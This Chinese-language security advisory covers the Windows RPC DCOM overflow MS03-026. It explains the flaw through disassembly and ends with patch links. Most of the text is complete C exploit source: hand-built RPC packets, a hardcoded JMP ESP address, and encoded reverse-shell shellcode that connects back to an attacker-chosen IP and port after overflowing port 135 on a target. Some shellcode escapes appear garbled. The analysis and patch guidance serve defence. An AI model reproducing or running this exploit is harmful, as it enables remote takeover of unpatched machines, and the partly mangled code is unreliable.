RPC溢出漏洞(MS03-26)已公布新的攻击代码
涉及程序:RPC溢出漏洞
描述:RPC溢出漏洞(MS03-26)已公布新的攻击代码
详细:
自RPC被发现存在严重的缓冲溢出漏洞以来,安络也一直在跟踪,并对其进行了深入研究。在此以前已先后发布了两篇安全漏洞公告(Microsoft RPC接口远程溢出缺陷允许执行任意代码、Microsoft Windows 2000 DCOM RPC接口DoS及权限提升缺陷),并也提供了相应的测试代码。
鉴于此漏洞危险程度之高,安络将再次重申,希望引起广大用户的重视。因为此漏洞会影响nt2kxp2003+sp4的所有服务器,建议用户最好查一下是不是所有机器都打上了hotfix 。
LSD 的RPC溢出漏洞(MS03-26)其实包含了2个溢出漏洞,一个是本地的,一个是远程的。他们都是由一个通用接口导致的。
导致问题的调用如下:
hr = CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"
C:\1234561111111111111111111111111.doc",1,&qi);
这个调用的文件名参数(第5个参数,会引起溢出),当这个文件名超长的时候,会导致客户端的本地溢出(在RPCSS中的GetPathForServer函数里只给了0X220堆栈的空间,但是是用lstrcpyw进行拷贝的),这个我们在这里就不深入研究了(不过这个API先会检查本地文件是否存在,在进行处理,因此由于建不了长文件,所以要利用这个溢出不能直接调用这个API,而是构造好包信息以后直接调用LPC的函数,有兴趣的可以自己去试。),我们来讲解一下远程的溢出。
在客户端给服务器传递这个参数的时候,会自动转化成如下格式:L“\servernamec$1234561111111111111111111111111.doc"这样的形式传递给远程服务器,于是在远程服务器的处理中会先取出servername名,但是这里没做检查,给定了0X20(默认问题代码如下:
GetPathForServer:
.text:761543DA push ebp
.text:761543DB mov ebp, esp
.text:761543DD sub esp, 20h <-----0x20空间
.text:761543E0 mov eax, [ebp+arg_4]
.text:761543E3 push ebx
.text:761543E4 push esi
.text:761543E5 mov esi, [ebp+hMem]
.text:761543E8 push edi
.text:761543E9 push 5Ch
.text:761543EB pop ebx
.text:761543EC mov [eax], esi
.text:761543EE cmp [esi], bx
.text:761543F1 mov edi, esi
.text:761543F3 jnz loc_761544BF
.text:761543F9 cmp [esi+2], bx
.text:761543FD jnz loc_761544BF
.text:76154403 lea eax, [ebp+String1]《-----------写入的地址,只有0X20
.text:76154406 push 0
.text:76154408 push eax
.text:76154409 push esi 〈----------------------我们传入的文件名参数
.text:7615440A call GetMachineName
。。。。。。。。。。。。。。。。。。。。。。。。。。 此函数返回的时候,溢出点生效
GetMachineName:
.text:7614DB6F mov eax, [ebp+arg_0]
.text:7614DB72 mov ecx, [ebp+arg_4]
.text:7614DB75 lea edx, [eax+4]
.text:7614DB78 mov ax, [eax+4]
.text:7614DB7C cmp ax, 5Ch 〈-----------------只判断0X5C
.text:7614DB80 jz short loc_7614DB93
.text:7614DB82 sub edx, ecx
.text:7614DB84
.text:7614DB84 loc_7614DB84: ; CODE XREF: sub_7614DA19+178 j
.text:7614DB84 mov [ecx], ax 〈----------------写入上个只有0X20的空间,超过就溢出
.text:7614DB87 inc ecx
.text:7614DB88 inc ecx
.text:7614DB89 mov ax, [ecx+edx]
.text:7614DB8D cmp ax, 5Ch
.text:7614DB91 jnz short loc_7614DB84
.text:7614DB93
攻击方法:
现在我们将提供新的攻击代码来利用这个漏洞,由于\SERVERNAME是由系统自动生成的,我们只能利用手工直接生成RPC的包来实现,另外SHELLCODE中不能包含0X5C,因为这样判断就是\SERVERNAME结束了。
下面就给出一个实现的代码,注意点如下:
1.由于RPCRT4,RPCSS中没有JMP ESP的代码,这里使用了OLE32.DLL中的,但是这可能是会重定位的,大家测试的时候需要再确定或自己找一个存在的JMP ESP的代码,我的这是WIN2000+SP3上的地址且OLE32未重定位情况下的。
2.这里使用了反向连接的SHELLCODE,需要先运行NC
3.程序中的SC的整体长度必须满足sizeof(sz)16=12的关系,因为不是整数的话,整个包的长度会有一些填充,那么计算就不满足我这里给出的一个简单关系了,会导致RPC包的解析无效果。
4.在溢出返回前,返回地址后面的2个参数还会使用,所以需要保证是个内存可写空间地址。
5.这里是直接使用堆栈溢出返回的,其实大家也可以尝试一下覆盖SEH,这里就不再多讲了。
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,
0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char sc[]=
"x46x00x58x00x4Ex00x42x00x46x00x58x00"
"x46x00x58x00x4Ex00x42x00x46x00x58x00x46x00x58x00"
"x46x00x58x00"
"x46x00x58x00x25x2bxaax77" file://JMP ESP地址 IN ole32.DLL,可能需要自己改动
"x38x6ex16x76x0dx6ex16x76" file://需要是可写的内存地址
file://下面是SHELLCODE,可以放自己的SHELLCODE,但必须保证sc的整体长度/16=12,不满足自己填充一些0X90吧
file://SHELLCODE不存在0X00,0X00与0X5C
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01"
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30"
"x93x40xe2xfa"
// code
"x7bxe4x93x93x93xd4xf6xe7xc3xe1xfcxf0xd2xf7xf7xe1"
"xf6xe0xe0x93xdfxfcxf2xf7xdfxfaxf1xe1xf2xe1xeaxd2"
"x93xd0xe1xf6xf2xe7xf6xc3xe1xfcxf0xf6xe0xe0xd2x93"
"xd0xffxfcxe0xf6xdbxf2xfdxf7xffxf6x93xd6xebxfaxe7"
"xc7xfbxe1xf6xf2xf7x93xe4xe0xa1xccxa0xa1x93xc4xc0"
"xd2xc0xe7xf2xe1xe7xe6xe3x93xc4xc0xd2xc0xfcxf0xf8"
"xf6xe7xd2x93xf0xffxfcxe0xf6xe0xfcxf0xf8xf6xe7x93"
"xf0xfcxfdxfdxf6xf0xe7x93xf0xfexf7x93xc9xc1x28x93"
"x93x63xe4x12xa8xdexc9x03x93xe7x90xd8x78x66x18xe0"
"xafx90x60x18xe5xebx90x60x18xedxb3x90x68x18xddx87"
"xc5xa0x53xc4xc2x18xacx90x68x18x61xa0x5ax22x9dx60"
"x35xcaxccxe7x9bx10x54x97xd3x71x7bx6cx72xcdx18xc5"
"xb7x90x40x42x73x90x51xa0x5axf5x18x9bx18xd5x8fx90"
"x50x52x72x91x90x52x18x83x90x40xcdx18x6dxa0x5ax22"
"x97x7bx08x93x93x93x10x55x98xc1xc5x6cxc4x63xc9x18"
"x4bxa0x5ax22x97x7bx14x93x93x93x10x55x9bxc6xfbx92"
"x92x93x93x6cxc4x63x16x53xe6xe0xc3xc3xc3xc3xd3xc3"
"xd3xc3x6cxc4x67x10x6bx6cxe7xf0x18x4bxf5x54xd6x93"
"x91x93xf5x54xd6x91x28x39x54xd6x97x4ex5fx28x39xf9"
"x83xc6xc0x6cxc4x6fx16x53xe6xd0xa0x5ax22x82xc4x18"
"x6ex60x38xccx54xd6x93xd7x93x93x93x1axcexafx1axce"
"xabx1axcexd3x54xd6xbfx92x92x93x93x1exd6xd7xc3xc6"
"xc2xc2xc2xd2xc2xdaxc2xc2xc5xc2x6cxc4x77x6cxe6xd7"
"x7fx19x95xd5x17x53xe6x6axc2xc1xc5xc0x6cx41xc9xca"
"x1ax94xd4xd4xd4xd4x71x7ax50x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90";
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
void main(int argc,char ** argv)
{
WSADATA WSAData;
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;
DWORD cb;
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:d
",WSAGetLastError());
return;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:d
",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:d",WSAGetLastError());
return;
}
port1 = htons (2300); file://反向连接的端口
port1 ^= 0x9393;
cb=0XD20AA8C0; file://反向连接的IP地址,这里是192。168。10。210,
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; file://计算文件名双字节长度
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
file://计算各种结构的长度
*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:d
",WSAGetLastError());
return;
}
len=recv(sock,buf1,1000,NULL);
if (send(sock,buf2,len1,0)==SOCKET_ERROR)
{
printf("Send failed.Error:d
",WSAGetLastError());
return;
}
len=recv(sock,buf1,1024,NULL);
}
解决方案:
下载补丁:
Windows NT 4.0 Server:
http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en
Windows NT 4.0 Terminal Server Edition :
http://microsoft.com/downloads/details.aspx?FamilyId=6C0F0160-64FA-424C-A3C1-C9FAD2DC65CA&displaylang=en
Windows XP 32 bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en
Windows XP 64 bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=1B00F5DF-4A85-488F-80E3-C347ADCC4DF1&displaylang=en
Windows Server 2003 32 bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en
Windows Server 2003 64 bit Edition:
http://microsoft.com/downloads/details.aspx?FamilyId=2B566973-C3F0-4EC1-995F-017E35692BC7&displaylang=en
临时解决方案:
* 使用防火墙过滤135端口
附加信息:
CVE(CAN) ID: CAN-2003-0352